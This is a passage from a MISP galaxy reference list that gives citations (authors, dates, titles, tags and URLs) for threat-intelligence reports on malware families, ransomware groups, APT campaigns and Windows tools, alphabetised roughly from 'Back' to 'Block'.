The tag is: misp-galaxy:references="TrendMicro Squiblydoo Aug 2017"

Table 12807. Table References

Links

https://blog.trendmicro.com/trendlabs-security-intelligence/backdoor-carrying-emails-set-sights-on-russian-speaking-businesses/

Symantec Darkmoon Aug 2005

Hayashi, K. (2005, August 18). Backdoor.Darkmoon. Retrieved February 23, 2018.

The tag is: misp-galaxy:references="Symantec Darkmoon Aug 2005"

Table 12808. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2005-081910-3934-99

ESET BackdoorDiplomacy Jun 2021

Adam Burgher. (2021, June 10). BackdoorDiplomacy: Upgrading from Quarian to Turian. Retrieved September 1, 2021

The tag is: misp-galaxy:references="ESET BackdoorDiplomacy Jun 2021"

Table 12809. Table References

Links

https://www.welivesecurity.com/2021/06/10/backdoordiplomacy-upgrading-quarian-turian/

Backdooring an AWS account

Daniel Grzelak. (2016, July 9). Backdooring an AWS account. Retrieved May 27, 2022.

The tag is: misp-galaxy:references="Backdooring an AWS account"

Table 12810. Table References

Links

https://medium.com/daniel-grzelak/backdooring-an-aws-account-da007d36f8f9

Symantec Linfo May 2012

Zhou, R. (2012, May 15). Backdoor.Linfo. Retrieved February 23, 2018.

The tag is: misp-galaxy:references="Symantec Linfo May 2012"

Table 12811. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-051605-2535-99

Symantec Backdoor.Mivast

Stama, D.. (2015, February 6). Backdoor.Mivast. Retrieved February 15, 2016.

The tag is: misp-galaxy:references="Symantec Backdoor.Mivast"

Table 12812. Table References

Links

http://www.symantec.com/security_response/writeup.jsp?docid=2015-020623-0740-99&tabid=2

Symantec Nerex May 2012

Ladley, F. (2012, May 15). Backdoor.Nerex. Retrieved February 23, 2018.

The tag is: misp-galaxy:references="Symantec Nerex May 2012"

Table 12813. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-051515-3445-99

Symantec Backdoor.Nidiran

Sponchioni, R.. (2016, March 11). Backdoor.Nidiran. Retrieved August 3, 2016.

The tag is: misp-galaxy:references="Symantec Backdoor.Nidiran"

Table 12814. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2015-120123-5521-99

Symantec Remsec IOCs

Symantec Security Response. (2016, August 8). Backdoor.Remsec indicators of compromise. Retrieved August 17, 2016.

The tag is: misp-galaxy:references="Symantec Remsec IOCs"

Table 12815. Table References

Links

http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/Symantec_Remsec_IOCs.pdf

Symantec Ristol May 2012

Ladley, F. (2012, May 15). Backdoor.Ritsol. Retrieved February 23, 2018.

The tag is: misp-galaxy:references="Symantec Ristol May 2012"

Table 12816. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-051515-3909-99

Symantec Vasport May 2012

Zhou, R. (2012, May 15). Backdoor.Vasport. Retrieved February 22, 2018.

The tag is: misp-galaxy:references="Symantec Vasport May 2012"

Table 12817. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-051606-5938-99

FSecure Hupigon

FSecure. (n.d.). Backdoor - W32/Hupigon.EMV - Threat Description. Retrieved December 18, 2017.

The tag is: misp-galaxy:references="FSecure Hupigon"

Table 12818. Table References

Links

https://www.f-secure.com/v-descs/backdoor_w32_hupigon_emv.shtml

Symantec Wiarp May 2012

Zhou, R. (2012, May 15). Backdoor.Wiarp. Retrieved February 22, 2018.

The tag is: misp-galaxy:references="Symantec Wiarp May 2012"

Table 12819. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-051606-1005-99

Microsoft Lamin Sept 2017

Microsoft. (2009, May 17). Backdoor:Win32/Lamin.A. Retrieved September 6, 2018.

The tag is: misp-galaxy:references="Microsoft Lamin Sept 2017"

Table 12820. Table References

Links

https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?name=Backdoor:Win32/Lamin.A

Microsoft PoisonIvy 2017

McCormack, M. (2017, September 15). Backdoor:Win32/Poisonivy.E. Retrieved December 21, 2020.

The tag is: misp-galaxy:references="Microsoft PoisonIvy 2017"

Table 12821. Table References

Links

https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Backdoor%3aWin32%2fPoisonivy.E

Microsoft Win Defender Truvasys Sep 2017

Microsoft. (2017, September 15). Backdoor:Win32/Truvasys.A!dha. Retrieved November 30, 2017.

The tag is: misp-galaxy:references="Microsoft Win Defender Truvasys Sep 2017"

Table 12822. Table References

Links

https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Backdoor:Win32/Truvasys.A!dha

Microsoft Wingbird Nov 2017

Microsoft. (2017, November 9). Backdoor:Win32/Wingbird.A!dha. Retrieved November 27, 2017.

The tag is: misp-galaxy:references="Microsoft Wingbird Nov 2017"

Table 12823. Table References

Links

https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Backdoor:Win32/Wingbird.A!dha

Microsoft BITS

Microsoft. (n.d.). Background Intelligent Transfer Service. Retrieved January 12, 2018.

The tag is: misp-galaxy:references="Microsoft BITS"

Table 12824. Table References

Links

https://msdn.microsoft.com/library/windows/desktop/bb968799.aspx

NCC Group Research Blog August 19 2022

NCC Group Research Blog. (2022, August 19). Back in Black: Unlocking a LockBit 3.0 Ransomware Attack. Retrieved May 7, 2023.

The tag is: misp-galaxy:references="NCC Group Research Blog August 19 2022"

Table 12825. Table References

Links

https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack/

Tech Republic - Restore AWS Snapshots

Hardiman, N.. (2012, March 20). Backing up and restoring snapshots on Amazon EC2 machines. Retrieved October 8, 2019.

The tag is: misp-galaxy:references="Tech Republic - Restore AWS Snapshots"

Table 12826. Table References

Links

https://www.techrepublic.com/blog/the-enterprise-cloud/backing-up-and-restoring-snapshots-on-amazon-ec2-machines/

Secureworks COBALT DICKENS August 2018

Counter Threat Unit Research Team. (2018, August 24). Back to School: COBALT DICKENS Targets Universities. Retrieved February 3, 2021.

The tag is: misp-galaxy:references="Secureworks COBALT DICKENS August 2018"

Table 12827. Table References

Links

https://www.secureworks.com/blog/back-to-school-cobalt-dickens-targets-universities

Cybereason Kimsuky November 2020

Dahan, A. et al. (2020, November 2). Back to the Future: Inside the Kimsuky KGH Spyware Suite. Retrieved November 6, 2020.

The tag is: misp-galaxy:references="Cybereason Kimsuky November 2020"

Table 12828. Table References

Links

https://www.cybereason.com/blog/back-to-the-future-inside-the-kimsuky-kgh-spyware-suite

Proofpoint TA453 March 2021

Miller, J. et al. (2021, March 30). BadBlood: TA453 Targets US and Israeli Medical Research Personnel in Credential Phishing Campaigns. Retrieved May 4, 2021.

The tag is: misp-galaxy:references="Proofpoint TA453 March 2021"

Table 12829. Table References

Links

https://www.proofpoint.com/us/blog/threat-insight/badblood-ta453-targets-us-and-israeli-medical-research-personnel-credential

Unit 42 BadPatch Oct 2017

Bar, T., Conant, S. (2017, October 20). BadPatch. Retrieved November 13, 2018.

The tag is: misp-galaxy:references="Unit 42 BadPatch Oct 2017"

Table 12830. Table References

Links

https://researchcenter.paloaltonetworks.com/2017/10/unit42-badpatch/

ESET Bad Rabbit

M.Léveille, M-E.. (2017, October 24). Bad Rabbit: Not‑Petya is back with improved ransomware. Retrieved January 28, 2021.

The tag is: misp-galaxy:references="ESET Bad Rabbit"

Table 12831. Table References

Links

https://www.welivesecurity.com/2017/10/24/bad-rabbit-not-petya-back/

Secure List Bad Rabbit

Mamedov, O. Sinitsyn, F. Ivanov, A.. (2017, October 24). Bad Rabbit ransomware. Retrieved January 28, 2021.

The tag is: misp-galaxy:references="Secure List Bad Rabbit"

Table 12832. Table References

Links

https://securelist.com/bad-rabbit-ransomware/82851/

BlackBerry Bahamut

The BlackBerry Research & Intelligence Team. (2020, October). BAHAMUT: Hack-for-Hire Masters of Phishing, Fake News, and Fake Apps. Retrieved February 8, 2021.

The tag is: misp-galaxy:references="BlackBerry Bahamut"

Table 12833. Table References

Links

https://www.blackberry.com/us/en/pdfviewer?file=/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-spark-bahamut.pdf

BaltimoreSun RobbinHood May 2019

Duncan, I., Campbell, C. (2019, May 7). Baltimore city government computer network hit by ransomware attack. Retrieved July 29, 2019.

The tag is: misp-galaxy:references="BaltimoreSun RobbinHood May 2019"

Table 12834. Table References

Links

https://www.baltimoresun.com/politics/bs-md-ci-it-outage-20190507-story.html

CheckPoint Bandook Nov 2020

Check Point. (2020, November 26). Bandook: Signed & Delivered. Retrieved May 31, 2021.

The tag is: misp-galaxy:references="CheckPoint Bandook Nov 2020"

Table 12835. Table References

Links

https://research.checkpoint.com/2020/bandook-signed-delivered/

Banker Google Chrome Extension Steals Creds

Marinho, R. (n.d.). (Banker(GoogleChromeExtension)).targeting. Retrieved November 18, 2017.

The tag is: misp-galaxy:references="Banker Google Chrome Extension Steals Creds"

Table 12836. Table References

Links

https://isc.sans.edu/forums/diary/BankerGoogleChromeExtensiontargetingBrazil/22722/

Unit42 Banking Trojans Hooking 2022

Or Chechik. (2022, October 31). Banking Trojan Techniques: How Financially Motivated Malware Became Infrastructure. Retrieved September 27, 2023.

The tag is: misp-galaxy:references="Unit42 Banking Trojans Hooking 2022"

Table 12837. Table References

Links

https://unit42.paloaltonetworks.com/banking-trojan-techniques/#post-125550-_rm3d6xxbk52n

Linux manual bash invocation

ArchWiki. (2021, January 19). Bash. Retrieved February 25, 2021.

The tag is: misp-galaxy:references="Linux manual bash invocation"

Table 12838. Table References

Links

https://wiki.archlinux.org/index.php/Bash#Invocation

DieNet Bash

die.net. (n.d.). bash(1) - Linux man page. Retrieved June 12, 2020.

The tag is: misp-galaxy:references="DieNet Bash"

Table 12839. Table References

Links

https://linux.die.net/man/1/bash

Bash.exe - LOLBAS Project

LOLBAS. (2018, May 25). Bash.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Bash.exe - LOLBAS Project"

Table 12840. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Bash/

Bashfuscator Command Obfuscators

LeFevre, A. (n.d.). Bashfuscator Command Obfuscators. Retrieved March 17, 2023.

The tag is: misp-galaxy:references="Bashfuscator Command Obfuscators"

Table 12841. Table References

Links

https://bashfuscator.readthedocs.io/en/latest/Mutators/command_obfuscators/index.html

Microsoft Basic TxF Concepts

Microsoft. (n.d.). Basic TxF Concepts. Retrieved December 20, 2017.

The tag is: misp-galaxy:references="Microsoft Basic TxF Concepts"

Table 12842. Table References

Links

https://msdn.microsoft.com/library/windows/desktop/dd979526.aspx

BATLOADER: The Evasive Downloader Malware

Bethany Hardin, Lavine Oluoch, Tatiana Vollbrecht. (2022, November 14). BATLOADER: The Evasive Downloader Malware. Retrieved June 5, 2023.

The tag is: misp-galaxy:references="BATLOADER: The Evasive Downloader Malware"

Table 12843. Table References

Links

https://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html

Palo Alto Networks BBSRAT

Lee, B. Grunzweig, J. (2015, December 22). BBSRAT Attacks Targeting Russian Organizations Linked to Roaming Tiger. Retrieved August 19, 2016.

The tag is: misp-galaxy:references="Palo Alto Networks BBSRAT"

Table 12844. Table References

Links

http://researchcenter.paloaltonetworks.com/2015/12/bbsrat-attacks-targeting-russian-organizations-linked-to-roaming-tiger/

Microsoft bcdedit 2021

Microsoft. (2021, May 27). bcdedit. Retrieved June 23, 2021.

The tag is: misp-galaxy:references="Microsoft bcdedit 2021"

Table 12845. Table References

Links

https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/bcdedit

Securelist BlackEnergy Nov 2014

Baumgartner, K. and Garnaeva, M.. (2014, November 3). BE2 custom plugins, router abuse, and target profiles. Retrieved March 24, 2016.

The tag is: misp-galaxy:references="Securelist BlackEnergy Nov 2014"

Table 12846. Table References

Links

https://securelist.com/be2-custom-plugins-router-abuse-and-target-profiles/67353/

Securelist BlackEnergy Feb 2015

Baumgartner, K. and Garnaeva, M.. (2015, February 17). BE2 extraordinary plugins, Siemens targeting, dev fails. Retrieved March 24, 2016.

The tag is: misp-galaxy:references="Securelist BlackEnergy Feb 2015"

Table 12847. Table References

Links

https://securelist.com/be2-extraordinary-plugins-siemens-targeting-dev-fails/68838/

Crowdstrike DNC June 2016

Alperovitch, D.. (2016, June 15). Bears in the Midst: Intrusion into the Democratic National Committee. Retrieved August 3, 2016.

The tag is: misp-galaxy:references="Crowdstrike DNC June 2016"

Table 12848. Table References

Links

https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/

Deep Instinct Black Basta August 2022

Vilkomir-Preisman, S. (2022, August 18). Beating Black Basta Ransomware. Retrieved March 8, 2023.

The tag is: misp-galaxy:references="Deep Instinct Black Basta August 2022"

Table 12849. Table References

Links

https://www.deepinstinct.com/blog/black-basta-ransomware-threat-emergence

Bienstock, D. - Defending O365 - 2019

Bienstock, D.. (2019). BECS and Beyond: Investigating and Defending O365. Retrieved September 13, 2019.

The tag is: misp-galaxy:references="Bienstock, D. - Defending O365 - 2019"

Table 12850. Table References

Links

https://www.slideshare.net/DouglasBienstock/shmoocon-2019-becs-and-beyond-investigating-and-defending-office-365

Kevin Mandia Statement to US Senate Committee on Intelligence

Kevin Mandia. (2017, March 30). Prepared Statement of Kevin Mandia, CEO of FireEye, Inc. before the United States Senate Select Committee on Intelligence. Retrieved April 19, 2019.

The tag is: misp-galaxy:references="Kevin Mandia Statement to US Senate Committee on Intelligence"

Table 12851. Table References

Links

https://www.intelligence.senate.gov/sites/default/files/documents/os-kmandia-033017.pdf

Microsoft Dofoil 2018

Windows Defender Research. (2018, March 7). Behavior monitoring combined with machine learning spoils a massive Dofoil coin mining campaign. Retrieved March 20, 2018.

The tag is: misp-galaxy:references="Microsoft Dofoil 2018"

Table 12852. Table References

Links

https://cloudblogs.microsoft.com/microsoftsecure/2018/03/07/behavior-monitoring-combined-with-machine-learning-spoils-a-massive-dofoil-coin-mining-campaign/

FireEye CARBANAK June 2017

Bennett, J., Vengerik, B. (2017, June 12). Behind the CARBANAK Backdoor. Retrieved June 11, 2018.

The tag is: misp-galaxy:references="FireEye CARBANAK June 2017"

Table 12853. Table References

Links

https://www.fireeye.com/blog/threat-research/2017/06/behind-the-carbanak-backdoor.html

Expel Behind the Scenes

  1. Lipton, L. Easterly, A. Randazzo and J. Hencinski. (2020, July 28). Behind the scenes in the Expel SOC: Alert-to-fix in AWS. Retrieved October 1, 2020.

The tag is: misp-galaxy:references="Expel Behind the Scenes"

Table 12854. Table References

Links

https://expel.io/blog/behind-the-scenes-expel-soc-alert-aws/

Microsoft BEC Campaign

Carr, N., Sellmer, S. (2021, June 14). Behind the scenes of business email compromise: Using cross-domain threat data to disrupt a large BEC campaign. Retrieved June 15, 2021.

The tag is: misp-galaxy:references="Microsoft BEC Campaign"

Table 12855. Table References

Links

https://www.microsoft.com/security/blog/2021/06/14/behind-the-scenes-of-business-email-compromise-using-cross-domain-threat-data-to-disrupt-a-large-bec-infrastructure/

Unit42 BendyBear Feb 2021

Harbison, M. (2021, February 9). BendyBear: Novel Chinese Shellcode Linked With Cyber Espionage Group BlackTech. Retrieved February 16, 2021.

The tag is: misp-galaxy:references="Unit42 BendyBear Feb 2021"

Table 12856. Table References

Links

https://unit42.paloaltonetworks.com/bendybear-shellcode-blacktech/

Google Cloud Storage Best Practices, 2019

Google. (2019, September 16). Best practices for Cloud Storage. Retrieved October 4, 2019.

The tag is: misp-galaxy:references="Google Cloud Storage Best Practices, 2019"

Table 12857. Table References

Links

https://cloud.google.com/storage/docs/best-practices

Shadowbunny VM Defense Evasion

Johann Rehberger. (2020, September 23). Beware of the Shadowbunny - Using virtual machines to persist and evade detections. Retrieved September 22, 2021.

The tag is: misp-galaxy:references="Shadowbunny VM Defense Evasion"

Table 12858. Table References

Links

https://embracethered.com/blog/posts/2020/shadowbunny-virtual-machine-red-teaming-technique/

Hexacorn Office Test

Hexacorn. (2014, April 16). Beyond good ol’ Run key, Part 10. Retrieved July 3, 2017.

The tag is: misp-galaxy:references="Hexacorn Office Test"

Table 12859. Table References

Links

http://www.hexacorn.com/blog/2014/04/16/beyond-good-ol-run-key-part-10/

Hexacorn Logon Scripts

Hexacorn. (2014, November 14). Beyond good ol’ Run key, Part 18. Retrieved November 15, 2019.

The tag is: misp-galaxy:references="Hexacorn Logon Scripts"

Table 12860. Table References

Links

http://www.hexacorn.com/blog/2014/11/14/beyond-good-ol-run-key-part-18/

Hexacorn Office Template Macros

Hexacorn. (2017, April 17). Beyond good ol’ Run key, Part 62. Retrieved July 3, 2017.

The tag is: misp-galaxy:references="Hexacorn Office Template Macros"

Table 12861. Table References

Links

http://www.hexacorn.com/blog/2017/04/19/beyond-good-ol-run-key-part-62/

Bginfo.exe - LOLBAS Project

LOLBAS. (2018, May 25). Bginfo.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Bginfo.exe - LOLBAS Project"

Table 12862. Table References

Links

https://lolbas-project.github.io/lolbas/OtherMSBinaries/Bginfo/

BianLian Ransomware Gang Gives It a Go! | [redacted]

Ben Armstrong, Lauren Pearce, Brad Pittack, Danny Quist. (2022, September 1). BianLian Ransomware Gang Gives It a Go!. Retrieved May 18, 2023.

The tag is: misp-galaxy:references="BianLian Ransomware Gang Gives It a Go! | [redacted]"

Table 12863. Table References

Links

https://redacted.com/blog/bianlian-ransomware-gang-gives-it-a-go/

Group IB APT 41 June 2021

Rostovcev, N. (2021, June 10). Big airline heist APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.

The tag is: misp-galaxy:references="Group IB APT 41 June 2021"

Table 12864. Table References

Links

https://www.group-ib.com/blog/colunmtk-apt41/

Crowdstrike Indrik November 2018

Frankoff, S., Hartley, B. (2018, November 14). Big Game Hunting: The Evolution of INDRIK SPIDER From Dridex Wire Fraud to BitPaymer Targeted Ransomware. Retrieved January 6, 2021.

The tag is: misp-galaxy:references="Crowdstrike Indrik November 2018"

Table 12865. Table References

Links

https://www.crowdstrike.com/blog/big-game-hunting-the-evolution-of-indrik-spider-from-dridex-wire-fraud-to-bitpaymer-targeted-ransomware/

CrowdStrike Ryuk January 2019

Hanel, A. (2019, January 10). Big Game Hunting with Ryuk: Another Lucrative Targeted Ransomware. Retrieved May 12, 2020.

The tag is: misp-galaxy:references="CrowdStrike Ryuk January 2019"

Table 12866. Table References

Links

https://www.crowdstrike.com/blog/big-game-hunting-with-ryuk-another-lucrative-targeted-ransomware/

OWASP Binary Planting

OWASP. (2013, January 30). Binary planting. Retrieved June 7, 2016.

The tag is: misp-galaxy:references="OWASP Binary Planting"

Table 12867. Table References

Links

https://www.owasp.org/index.php/Binary_planting

Wikipedia Binary-to-text Encoding

Wikipedia. (2016, December 26). Binary-to-text encoding. Retrieved March 1, 2017.

The tag is: misp-galaxy:references="Wikipedia Binary-to-text Encoding"

Table 12868. Table References

Links

https://en.wikipedia.org/wiki/Binary-to-text_encoding

Sucuri BIND9 August 2015

Cid, D.. (2015, August 2). BIND9 – Denial of Service Exploit in the Wild. Retrieved April 26, 2019.

The tag is: misp-galaxy:references="Sucuri BIND9 August 2015"

Table 12869. Table References

Links

https://blog.sucuri.net/2015/08/bind9-denial-of-service-exploit-in-the-wild.html

Wikipedia BIOS

Wikipedia. (n.d.). BIOS. Retrieved January 5, 2016.

The tag is: misp-galaxy:references="Wikipedia BIOS"

Table 12870. Table References

Links

https://en.wikipedia.org/wiki/BIOS

Ge 2011

Ge, L. (2011, September 9). BIOS Threat is Showing up Again!. Retrieved November 14, 2014.

The tag is: misp-galaxy:references="Ge 2011"

Table 12871. Table References

Links

http://www.symantec.com/connect/blogs/bios-threat-showing-again

Talos Bisonal Mar 2020

Mercer, W., et al. (2020, March 5). Bisonal: 10 years of play. Retrieved January 26, 2022.

The tag is: misp-galaxy:references="Talos Bisonal Mar 2020"

Table 12872. Table References

Links

https://blog.talosintelligence.com/2020/03/bisonal-10-years-of-play.html

Talos Bisonal 10 Years March 2020

Warren Mercer, Paul Rascagneres, Vitor Ventura. (2020, March 6). Bisonal 10 Years of Play. Retrieved October 17, 2021.

The tag is: misp-galaxy:references="Talos Bisonal 10 Years March 2020"

Table 12873. Table References

Links

https://blog.talosintelligence.com/2020/03/bisonal-10-years-of-play.html

Unit 42 Bisonal July 2018

Hayashi, K., Ray, V. (2018, July 31). Bisonal Malware Used in Attacks Against Russia and South Korea. Retrieved August 7, 2018.

The tag is: misp-galaxy:references="Unit 42 Bisonal July 2018"

Table 12874. Table References

Links

https://researchcenter.paloaltonetworks.com/2018/07/unit42-bisonal-malware-used-attacks-russia-south-korea/

Bitsadmin.exe - LOLBAS Project

LOLBAS. (2018, May 25). Bitsadmin.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Bitsadmin.exe - LOLBAS Project"

Table 12875. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/

Microsoft BITSAdmin

Microsoft. (n.d.). BITSAdmin Tool. Retrieved January 12, 2018.

The tag is: misp-galaxy:references="Microsoft BITSAdmin"

Table 12876. Table References

Links

https://msdn.microsoft.com/library/aa362813.aspx

Cisco Talos Bitter Bangladesh May 2022

Raghuprasad, C . (2022, May 11). Bitter APT adds Bangladesh to their targets. Retrieved June 1, 2022.

The tag is: misp-galaxy:references="Cisco Talos Bitter Bangladesh May 2022"

Table 12877. Table References

Links

https://blog.talosintelligence.com/2022/05/bitter-apt-adds-bangladesh-to-their.html

Forcepoint BITTER Pakistan Oct 2016

Dela Paz, R. (2016, October 21). BITTER: a targeted attack against Pakistan. Retrieved June 1, 2022.

The tag is: misp-galaxy:references="Forcepoint BITTER Pakistan Oct 2016"

Table 12878. Table References

Links

https://www.forcepoint.com/blog/x-labs/bitter-targeted-attack-against-pakistan

Camba RARSTONE

Camba, A. (2013, February 27). BKDR_RARSTONE: New RAT to Watch Out For. Retrieved January 8, 2016.

The tag is: misp-galaxy:references="Camba RARSTONE"

Table 12879. Table References

Links

http://blog.trendmicro.com/trendlabs-security-intelligence/bkdr_rarstone-new-rat-to-watch-out-for/

TrendMicro BKDR_URSNIF.SM

Sioting, S. (2013, June 15). BKDR_URSNIF.SM. Retrieved June 5, 2019.

The tag is: misp-galaxy:references="TrendMicro BKDR_URSNIF.SM"

Table 12880. Table References

Links

https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/BKDR_URSNIF.SM?_ga=2.129468940.1462021705.1559742358-1202584019.1549394279

Cyble September 28 2022

Cybleinc. (2023, September 28). Bl00dy – New Ransomware Strain Active in the Wild. Retrieved August 3, 2023.

The tag is: misp-galaxy:references="Cyble September 28 2022"

Table 12881. Table References

Links

https://cyble.com/blog/bl00dy-new-ransomware-strain-active-in-the-wild/

Trend Micro Pikabot January 9 2024

Shinji Robert Arasawa, Joshua Aquino, Charles Steven Derion, Juhn Emmanuel Atanque, Francisrey Joshua Castillo, John Carlo Marquez, Henry Salcedo, John Rainier Navato, Arianne Dela Cruz, Raymart Yambot, Ian Kenefick. (2024, January 9). Black Basta-Affiliated Water Curupira’s Pikabot Spam Campaign. Retrieved January 11, 2024.

The tag is: misp-galaxy:references="Trend Micro Pikabot January 9 2024"

Table 12882. Table References

Links

https://www.trendmicro.com/en_us/research/24/a/a-look-into-pikabot-spam-wave-campaign.html

Check Point Black Basta October 2022

Check Point. (2022, October 20). BLACK BASTA AND THE UNNOTICED DELIVERY. Retrieved March 8, 2023.

The tag is: misp-galaxy:references="Check Point Black Basta October 2022"

Table 12883. Table References

Links

https://research.checkpoint.com/2022/black-basta-and-the-unnoticed-delivery/

BlackBasta

Antonio Cocomazzi and Antonio Pirozzi. (2022, November 3). Black Basta Ransomware | Attacks Deploy Custom EDR Evasion Tools Tied to FIN7 Threat Actor. Retrieved March 14, 2023.

The tag is: misp-galaxy:references="BlackBasta"

Table 12884. Table References

Links

https://www.sentinelone.com/labs/black-basta-ransomware-attacks-deploy-custom-edr-evasion-tools-tied-to-fin7-threat-actor/

Trend Micro Black Basta October 2022

Kenefick, I. et al. (2022, October 12). Black Basta Ransomware Gang Infiltrates Networks via QAKBOT, Brute Ratel, and Cobalt Strike. Retrieved February 6, 2023.

The tag is: misp-galaxy:references="Trend Micro Black Basta October 2022"

Table 12885. Table References

Links

https://www.trendmicro.com/en_us/research/22/j/black-basta-infiltrates-networks-via-qakbot-brute-ratel-and-coba.html

Uptycs Black Basta ESXi June 2022

Sharma, S. and Hegde, N. (2022, June 7). Black basta Ransomware Goes Cross-Platform, Now Targets ESXi Systems. Retrieved March 8, 2023.

The tag is: misp-galaxy:references="Uptycs Black Basta ESXi June 2022"

Table 12886. Table References

Links

https://www.uptycs.com/blog/black-basta-ransomware-goes-cross-platform-now-targets-esxi-systems

BlackBerry Black Basta May 2022

Ballmer, D. (2022, May 6). Black Basta: Rebrand of Conti or Something New?. Retrieved March 7, 2023.

The tag is: misp-galaxy:references="BlackBerry Black Basta May 2022"

Table 12887. Table References

Links

https://blogs.blackberry.com/en/2022/05/black-basta-rebrand-of-conti-or-something-new

FBI BlackCat April 19 2022

FBI. (2022, April 19). BlackCat/ALPHV Ransomware Indicators of Compromise. Retrieved September 14, 2023.

The tag is: misp-galaxy:references="FBI BlackCat April 19 2022"

Table 12888. Table References

Links

https://www.ic3.gov/Media/News/2022/220420.pdf

X-Force BlackCat May 30 2023

IBM Security X-Force Team. (2023, May 30). BlackCat (ALPHV) ransomware levels up for stealth, speed and exfiltration. Retrieved September 14, 2023.

The tag is: misp-galaxy:references="X-Force BlackCat May 30 2023"

Table 12889. Table References

Links

https://securityintelligence.com/posts/blackcat-ransomware-levels-up-stealth-speed-exfiltration/

BlackBerry BlackCat Threat Overview

BlackBerry. (n.d.). BlackCat Malware (AKA ALPHV). Retrieved September 14, 2023.

The tag is: misp-galaxy:references="BlackBerry BlackCat Threat Overview"

Table 12890. Table References

Links

https://www.blackberry.com/us/en/solutions/endpoint-security/ransomware-protection/blackcat

Sophos BlackCat Jul 2022

Brandt, Andrew. (2022, July 14). BlackCat ransomware attacks not merely a byproduct of bad luck. Retrieved December 20, 2022.

The tag is: misp-galaxy:references="Sophos BlackCat Jul 2022"

Table 12891. Table References

Links

https://news.sophos.com/en-us/2022/07/14/blackcat-ransomware-attacks-not-merely-a-byproduct-of-bad-luck/

ESET BlackEnergy Jan 2016

Cherepanov, A.. (2016, January 3). BlackEnergy by the SSHBearDoor: attacks against Ukrainian news media and electric industry . Retrieved June 10, 2020.

The tag is: misp-galaxy:references="ESET BlackEnergy Jan 2016"

Table 12892. Table References

Links

https://www.welivesecurity.com/2016/01/03/blackenergy-sshbeardoor-details-2015-attacks-ukrainian-news-media-electric-industry/

ESEST Black Energy Jan 2016

Cherepanov, A.. (2016, January 3). BlackEnergy by the SSHBearDoor: attacks against Ukrainian news media and electric industry. Retrieved May 18, 2016.

The tag is: misp-galaxy:references="ESEST Black Energy Jan 2016"

Table 12893. Table References

Links

http://www.welivesecurity.com/2016/01/03/blackenergy-sshbeardoor-details-2015-attacks-ukrainian-news-media-electric-industry/

F-Secure BlackEnergy 2014

F-Secure Labs. (2014). BlackEnergy & Quedagh: The convergence of crimeware and APT attacks. Retrieved March 24, 2016.

The tag is: misp-galaxy:references="F-Secure BlackEnergy 2014"

Table 12894. Table References

Links

https://blog-assets.f-secure.com/wp-content/uploads/2019/10/15163408/BlackEnergy_Quedagh.pdf

Securelist BlackOasis Oct 2017

Kaspersky Lab’s Global Research & Analysis Team. (2017, October 16). BlackOasis APT and new targeted attacks leveraging zero-day exploit. Retrieved February 15, 2018.

The tag is: misp-galaxy:references="Securelist BlackOasis Oct 2017"

Table 12895. Table References

Links

https://securelist.com/blackoasis-apt-and-new-targeted-attacks-leveraging-zero-day-exploit/82732/

Palo Alto Black-T October 2020

Quist, N. (2020, October 5). Black-T: New Cryptojacking Variant from TeamTNT. Retrieved September 22, 2021.

The tag is: misp-galaxy:references="Palo Alto Black-T October 2020"

Table 12896. Table References

Links

https://unit42.paloaltonetworks.com/black-t-cryptojacking-variant/

BlackWater Malware Cloudflare Workers

Lawrence Abrams. (2020, March 14). BlackWater Malware Abuses Cloudflare Workers for C2 Communication. Retrieved July 8, 2022.

The tag is: misp-galaxy:references="BlackWater Malware Cloudflare Workers"

Table 12897. Table References

Links

https://www.bleepingcomputer.com/news/security/blackwater-malware-abuses-cloudflare-workers-for-c2-communication/

NHS UK BLINDINGCAN Aug 2020

NHS Digital . (2020, August 20). BLINDINGCAN Remote Access Trojan. Retrieved August 20, 2020.

The tag is: misp-galaxy:references="NHS UK BLINDINGCAN Aug 2020"

Table 12898. Table References

Links

https://digital.nhs.uk/cyber-alerts/2020/cc-3603

Azure Blob Snapshots

Microsoft Azure. (2021, December 29). Blob snapshots. Retrieved March 2, 2022.

The tag is: misp-galaxy:references="Azure Blob Snapshots"

Table 12899. Table References

Links

https://docs.microsoft.com/en-us/azure/storage/blobs/snapshots-overview

objsee block blocking login items

Patrick Wardle. (2018, July 23). Block Blocking Login Items. Retrieved October 1, 2021.

The tag is: misp-galaxy:references="objsee block blocking login items"

Table 12900. Table References

Links

https://objective-see.com/blog/blog_0x31.html

Technospot Chrome Extensions GP

Mohta, A. (n.d.). Block Chrome Extensions using Google Chrome Group Policy Settings. Retrieved January 10, 2018.

The tag is: misp-galaxy:references="Technospot Chrome Extensions GP"

Table 12901. Table References

Links

http://www.technospot.net/blogs/block-chrome-extensions-using-google-chrome-group-policy-settings/

Evi1cg Forfiles Nov 2017

Evi1cg. (2017, November 26). block cmd.exe ? try this :. Retrieved January 22, 2018.

The tag is: misp-galaxy:references="Evi1cg Forfiles Nov 2017"

Table 12902. Table References

Links

https://twitter.com/Evi1cg/status/935027922397573120

Fifield Blocking Resistent Communication through domain fronting 2015

